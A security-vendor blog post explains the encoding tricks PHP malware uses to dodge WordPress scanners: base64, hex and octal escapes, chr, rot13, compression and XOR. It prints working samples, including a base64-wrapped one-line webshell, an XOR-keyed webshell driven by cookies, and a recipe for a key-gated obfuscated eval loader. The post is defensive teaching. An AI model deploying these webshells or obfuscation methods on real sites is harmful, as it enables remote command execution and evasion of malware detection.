Know your Malware – A Beginner’s Guide to Encoding Techniques Used to Obfuscate Malware
With the launch of Wordfence CLI, our high performance security scanner that can detect the vast majority of PHP malware targeting WordPress, Wordfence continues to emphasize the importance of malware detection and remediation. Malware targeting WordPress uses a variety of obfuscation techniques to avoid detection, and today’s post dives into some of the most common built-in PHP functionality malware often makes use of in order to do this.
What is Obfuscation?
Obfuscation is the process of concealing the purpose or functionality of code or data so that it evades detection and is more difficult for a human or security software to analyze, but still fulfills its intended purpose.
Obfuscation makes use of various types of encoding techniques, but is not exactly the same thing as encoding. There are countless legitimate uses for encoding data, including saving space through compression, transmitting data over a network, and packaging code so that it can be easily interpreted by programs in an expected format. Meanwhile obfuscation is intentionally designed to prevent understanding and detection by humans and security software.
Obfuscation is also different from encryption in that it can typically be reversed without a “key”, though there are some encoding techniques, such as XOR encoding, which do use keys and are used in both encryption and obfuscation.
Encoding Techniques
Since obfuscation often relies heavily on encoding techniques, It’s important to understand what these techniques look like, their typical legitimate use cases, and signs that they’re being used to hide something potentially malicious. In today’s article, we will cover some of the most commonly used encoding techniques, and teach you how to spot legitimate uses as well as potentially suspicious patterns.
Base64 Encoding
What is Base64 encoding?
Base64 encoding is widely used to send and store data. If you’ve ever played with Linux and tried to look at an executable file using the cat
command, you might have noticed that your terminal starts acting very strangely. This is because binary data includes an enormous number of potential byte sequences, and software that’s not designed to interpret a particular file format can incorrectly interpret some of these sequences as commands.
Base64 encoding allows any data, including binary data, to be stored and transmitted as text which makes it very convenient for programs to talk to one another without being misunderstood, especially over a network.
It uses 26 lower-case letters, 26 upper-case letters, the digits 0-9, and the ‘+’ and ‘/’ symbols for a total of 64 characters, plus ‘=’ for padding.
Note that, unlike the Base 8(Octal) and Base 16(Hexadecimal) encodings we’ll cover later, base64 is not a direct representation of the underlying bytes. Instead, it converts their octal representations to Base 10(Decimal) and then uses a lookup table to assign a character value. You can find out more about this process in the Wikipedia article on Base64 encoding.
How is Base64 Encoding Used Legitimately?
You’ve likely seen base64 encoded data in the past, and it’s very easy to spot – for instance, SGVsbG8sIFdvcmxkIQ==
decodes to “Hello, World!” and you can run the code snippet:
<?php echo base64_decode('SGVsbG8sIFdvcmxkIQ==');
to see this in action.
PHP uses the base64_encode
and base64_decode
functions to encode and decode Base64-encoded data. Many applications store information in this format as data files or database entries, so the presence of the base64_encode
and base64_decode
functions in a PHP file are often no cause for concern on their own.
How is Base64 Encoding Used by Malware?
It is significantly less common for base64-encoded data to be hardcoded into a PHP file, especially one that executes it as code.
For example,
<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'));
is a minimalist webshell. The eval
function tells PHP to execute whatever is decoded by the base64_decode
function as PHP, so once the string of data c3lzdGVtKCRfR0VUWydjbWQnXSk7
is decoded it will execute system($_GET['cmd']);
.
This uses the system
function to run the contents of the cmd
query string parameter as a terminal command. This means that if this webshell was installed on a site as webshell.php
, an attacker could go to http://victimsite.com/webshell.php?cmd=ls
to run the ls
command and list all files in the directory.
Byte Escape Sequences
What are Byte Escape Sequences?
You might already be familiar with some escape sequences, such as \n
to denote a new line of text, or \t
to denote a tab, but they can also be used to represent binary data.
PHP uses byte escape sequences for this, and they are similar to base64 encoding in that they are a way to represent both text and binary data as text strings.
There are two commonly used byte escape sequence formats used in PHP – Hexadecimal, which uses Base 16, and Octal, which uses Base 8.
Hex encoded byte sequences are represented by \x
followed by two characters, which can be any digit from 0 through 9 and the letters ‘a’ through ‘f’.
For example, the text “Hello, World!” can be represented as the following escaped sequence:
\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21
.
Octal byte sequences are represented by ‘\’ followed by a one to three digit number from 0 through 377.
For example, the text “Hello, World!” can be represented as the following escaped sequence:
\110\145\154\154\157\54\40\127\157\162\154\144\41
.
If you’ve ever worked with Linux filesystem permissions, they are also stored in octal format, for example ‘777’ which denotes that all users have permission to read, write, and execute.
PHP also uses unicode escape sequences, which begin with \u
and can be used to encode unicode characters used for international languages as well as as emojis. While unicode escape sequences can be used to bypass security systems, they are less commonly used in malware, and are beyond the scope of this article. If you’d like to learn more about unicode escape sequences, a good resource can be found here. Note that the article is targeted at JavaScript developers, but provides an excellent overview of the concepts involved.
How are Byte Escape Sequences Used Legitimately?
Byte escape sequences are used to store binary information, and many PHP applications use them to store encryption keys and to perform operations that can be sped up by handling binary data directly. As such they are most often found in code libraries for handling encryption and text manipulation and conversion.
How are Byte Escape Sequences Used by Malware?
PHP has an unusual property – any byte escape sequence surrounded by double quotes(“”) is automatically parsed. Moreover, PHP can interpret any valid combination of text, hex escape sequences, octal escape sequences, and unicode escape sequences in a single string. In other words, “He\x6c\x6c\x6f\54\40\127\157rld!”
will be processed by PHP as “Hello, World!”. You can actually test this using the following code snippet:
<?php echo "He\x6c\x6c\x6f\54\40\127\157rld!";
The fact that PHP can easily interpret such sequences but humans usually cannot read them make byte escape sequences ideal for obfuscation. It is very unusual for legitimate software to use mixed encodings in this manner, and so it is a very strong indicator of malicious activity.
Character Encoding
What is Character Encoding?
Character encoding is similar to hex encoding but more limited in that it can only be used to represent text and a very limited subset of control characters. PHP uses the chr
function to decode a number between 0 and 255 into a single character, and the ord
function to encode a single character back into a numeric value. This is slightly complicated by the fact that the chr
function accepts decimal, hexadecimal, and octal formatted numbers, but decimal format is most commonly used.
The following code provides an example of character encoding utilizing chr
, and would output “Hello, World!” when executed:
<?php echo chr(72).chr(101).chr(108).chr(108).chr(111).chr(44).chr(32).chr(87).chr(111).chr(114).chr(108).chr(100).chr(33);
Legitimate use of character encoding is somewhat rare in PHP, though it is occasionally used for text manipulation and inserting control characters such as null bytes in place of hex or octal encoding. It is far more commonly used in languages such as JavaScript where the code is often publicly visible.
One common use case is “reverse obfuscation” where character encoding in JavaScript is used to render an email address on a site in a way that a human can read it once the code is executed, but that older automated tools that can only view the uninterpreted code have difficulty scraping.
How is Character Encoding Used by Malware?
Character encoding is used by malware in almost exactly the same way as byte escape sequences, that is, to make the code more difficult for a human to read and security tools to interpret. It is frequently used by malware to hide malicious URLs that the malware then sends sensitive information or redirects visitors to.
Substitution Ciphers(rot13, etc.)
What are Substitution Ciphers?
One of the simplest ways to obfuscate content is to simply substitute letters for other letters. This method is known as a Caesar cipher, and most programming languages have a built-in method to do this, the most popular of which is simply to replace each letter with the one halfway across the alphabet from it, or 13 steps away. As such, “Hello, World!” becomes “Uryyb, Jbeyq!” The rot13 substitutions can be seen in the following table:
How are Substitution Ciphers Used Legitimately?
It is uncommon for substitution ciphers to be used in well-architected code, but some legitimate software does use it as a workaround when it has issues running in an environment where naive or poorly configured security software might hinder its intended execution, or when a value needs to be stored that won’t be interfered with by code that is looking for that value. In other words, it is almost always used to evade detection of some kind even by legitimate software.
How are Substitution Ciphers Used by Malware?
Malware frequently uses the str_rot13
function to obfuscate malicious URLs that it sends sensitive data, redirects visitors to, or receives commands from, that might be on a blocklist. It is a relatively strong signal of suspicious behavior, though it is not strong enough on its own to mark a file as malicious.
Compression (gzencoding, zlib encoding, and more)
What is Compression?
Compression refers to the process of compacting data, making it take up less space for storage and less bandwidth for transport. Compression algorithms are fairly complex, though many of them work in part by finding repeated patterns and storing references to them rather than the entire data.
As a very basic example, the text “aaaaabbbccca” could potentially be compressed to “a5b3c3a”. Real compression algorithms are significantly more sophisticated, and there are many other steps involved depending on the type of data being compressed.
There are a number of commonly used compression algorithms, including ones specifically designed to compress images, movies, and audio files. Media compression algorithms are often “lossy” and do not perfectly reconstruct the original data so much as produce output that looks or sounds similar enough to a human that it’s hard to notice.
In today’s article we are going to focus specifically on the functions most commonly used by PHP to compress and decompress arbitrary data, which use “lossless” compression and can perfectly reconstruct the original data from the archived format.
How is Compression used legitimately?
Most people are familiar with zip files, and many websites use compression to load large amounts of content more quickly while saving money on outbound data transfer. The most common compression algorithms used in PHP are Zlib and Gzip, both of which are handled by the Zlib module, though BZip2 is also fairly common.
Note that Gzip is not exactly the same thing as the zip files you may be familiar with as it can only compress single files, while modern zip archives can be configured to use many different algorithms including the one used by Gzip. There is a workaround to the single file problem, however – if you’ve ever seen a file with a .tar.gz
extension, It is very common to combine multiple files into a “tarball” and then compress the combined file using gzip.
Gzip uses an algorithm called “DEFLATE” which tends to be very fast and is often used by web servers to compress outbound data over the network. This process is effectively transparent – if configured correctly, a web server will send out a compressed page and your browser will automatically and transparently decompress and load it. Zlib and Bzip2 are slower but attain higher compression ratios so they’re often used to store archive files.
How is Compression Used by Malware?
Compressed files have a unique advantage for malicious actors – it is difficult to spot particular data in them, especially at high compression ratios. However, they also can’t easily be executed directly in the context of PHP. Compression isn’t limited to just files – any data, including text strings can be compressed. This means that an attacker can use compression to hide their code in a file and uncompress and execute it at runtime using, for instance, the gzinflate
and gzuncompress
functions.
There is one hurdle, however, which is that compressed files contain binary data, that is, data that can’t be directly represented as a text string. One solution to this is to load the compressed data from a separate, appropriately formatted file. Since attackers can often only upload a single file to take control of a site, this can be impractical.
While it is possible to mix string and raw binary data in a single file, reading these separately often requires knowing exactly where in the file everything is, which may be difficult if the file was uploaded or written by exploiting a vulnerability.
Earlier in the article, we discussed ways to safely store binary data in a text string, such as base64 encoding and byte escape sequences. These become significantly more useful to attackers when combined with compression algorithms, and we’ll examine this use case shortly.
XOR Encoding
What is XOR Encoding?
XOR (eXclusive OR) is a simple way to mix two sets of data together at the binary level, meaning it operates on the 1s and 0s that make up data. Think of it as a lightweight disguise for data. It takes two bits (a 1 or a 0) and compares them. If the bits are the same, it outputs 0; if they’re different, it outputs 1.
Here’s an example:
0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0
In PHP, you would use the ^ symbol to do an XOR operation between two characters. What actually happens is that the computer looks at the binary form of these characters and does the XOR bit by bit.
For example, the letter ‘A’ in binary is 01000001, and ‘B’ is 01000010. When you XOR them:
01000001
01000010
——–
00000011
You get a jumbled mix of the two. What makes XOR particularly useful is that if you take this result and do the exact same XOR operation on it again with ‘B’, you’ll get back ‘A’.
How is XOR Encoding Used Legitimately?
In practical terms, XOR is used for basic encryption or data masking. It’s fast and doesn’t require a lot of computing power. For example, if you have a secret key that both the sender and receiver know, you could XOR your message with this key to obscure the text before sending it over the internet. The downside to this is that it is usually trivial to find the “key” using statistical analysis, so while XOR encoding is used as part of a much more complex process by many strong encryption schemes, it is not secure encryption on its own.
How is XOR Encoding Used by Malware?
XOR encoding is particularly useful for attackers who want to restrict access to malware, such as webshells, used to control a website. For instance, by making the XOR “key” a value that isn’t present in the malware itself but is passed in by an input parameter, it acts as a password protection mechanism that makes the malware unable to run unless an attacker who knows the key sends a specially crafted request. Likewise, needing the key to deobfuscate the malware makes it much more difficult for security analysts and scanners to identify malicious behavior.
The following malicious file actually includes the “key” in the malware itself, but requires commands to be encoded with that key before they can be processed. It accepts various $_COOKIE
values and XORs them against the value of $odqwv
, then executes the decoded commands.
<?php $odqwv = "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc" ^ "trhvvbuzeadricgobq"; $mvxr = $_COOKIE; foreach ($mvxr as $q=>$h){ $mvxr[$q] = $odqwv($h) ^ str_pad($q, strlen($h), $q); } $zgas = $mvxr["dj"](); $lo = $mvxr["ayy"] ($zgas); $lo = $lo['uri']; $mvxr["l"] ($zgas, $mvxr["mdcgv"]); require($lo); $mvxr["kxldb"] ($zgas); $mvxr["rfmcipa"]($lo); ?>
This means that any attacker that knows the value of $odqwv
can thus send commands to the file that have already been XORd against that value, which will then be reversed and executed.
In this example, $odqwv
is the XORd value of \x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc
and trhvvbuzeadricgobq
which turns out to be “base64_decode.” You can find this value by creating a simple one liner
<?php $odqwv = "\x16\x13\x1b\x13@V*\x1e\x0\x2\xb\x16\xc" ^ "trhvvbuzeadricgobq"; echo $odqwv;?>
which prints the value. In this case $odqwv
is the literal string “base64_decode” but this is simply used as a key and does not refer to the built-in function itself.
The value in $_COOKIE[“dj”]
is then XORd against the $odqwv
key, which is ‘base64_decode’, and the result is called as a function, with similar steps occurring throughout the rest of the code.
Putting it All Together
Most obfuscated malware uses a combination of these techniques to hide its functionality, and combined techniques are one of the clearest indications of malicious activity. For example, take the following code:
<?php $base64_data = "09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA="; $xor_key = $_GET[‘k’]; $decoded_base64 = base64_decode($base64_data); $inflated_data = gzinflate($decoded_base64); $xor_decoded = $inflated_data ^ str_repeat($xor_key, strlen($inflated_data)); eval($xor_decoded); ?>
If supplied with the correct $xor_key
, it will output “Hello, World!”.
Let’s take a look at how we did this:
First, we took the code ‘echo “Hello, World!”;’ and XOR-encoded it with a key value of ‘K’, resulting in the output .(#$ki.''$gk$9'/jip.
We then ran it through the gzdeflate
function, which results in a binary output that can’t be rendered here, but after base64-encoding that output it turns into 09NQVsnOZNZTV1dJz5ZRsVTXz8osAAA=
.
If you placed the code in a hello.php
file on your site and accessed it, you’d get a blank screen unless you sent a request to /hello.php?k=K
, which would output “Hello, World!”.
While this example only outputs “Hello, World!” when it is passed the right key, it is trivial to disguise any PHP code in this manner, including destructive code that adds malicious administrators, creates additional malicious files, or alters system settings.
Conclusion
In today’s article, we discussed the most commonly used encoding techniques in PHP, their legitimate applications, and how malicious code uses them to obfuscate its purpose and intent. While obfuscation is an arms race, the Wordfence scanner and Wordfence CLI both use our incredibly effective malware detection signatures and are able to detect the vast majority of obfuscated malware targeting WordPress. A large part of why this is possible is due to our expertise and deep understanding of these encoding techniques and which combinations of encoding tend to indicate malicious behavior. Our experienced security analysts are continuously writing new signatures to improve our detection capabilities.
In a future article, we’ll cover more advanced obfuscation techniques that rely on other properties and quirks of PHP, but it’s necessary to understand basic encoding methods first because of how frequently they’re used, even when they’re not the primary method of obfuscation.
We encourage readers who want to learn more about this to experiment with the various code snippets we have presented. More advanced readers may wish to review public malware repositories in order to better learn to spot these indicators, but be sure to be careful with any actual malware samples you find and only execute them in a virtual environment, as even PHP malware can be used for local privilege escalation on vulnerable machines.
For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.
This article was written by Ramuel Gall, a former Wordfence Senior Security Researcher.
Comments